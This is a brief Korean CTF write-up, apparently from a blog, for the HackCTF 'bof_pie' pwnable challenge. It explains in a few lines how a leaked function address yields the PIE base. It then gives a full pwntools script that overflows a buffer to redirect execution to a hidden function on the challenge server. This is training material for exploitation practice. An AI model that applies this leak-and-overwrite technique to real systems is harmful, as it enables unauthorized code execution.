welcome 주소를 출력하기 때문에 pie_base를 구할 수 있고
pie_base + j0n9hyun을 해서 주소를 구한 후
더미 + (pie_base + j0n9hyun) 해서 전달하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3008)
e = ELF('bof_pie')
r.recvuntil('is ')
pie_base = int(r.recv(10), 16)-e.sym['welcome']
payload = 'A'*22
payload += p32(pie_base+e.sym['j0n9hyun'])
r.sendline(payload)
r.interactive()'HackCTF > pwnable' 카테고리의 다른 글
| HackCTF - Yes or no (0) | 2021.11.21 |
|---|---|
| HackCTF - Offset (0) | 2021.11.21 |
| HackCTF - Simple_Overflow_ver_2 (0) | 2021.11.21 |
| HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
| HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |
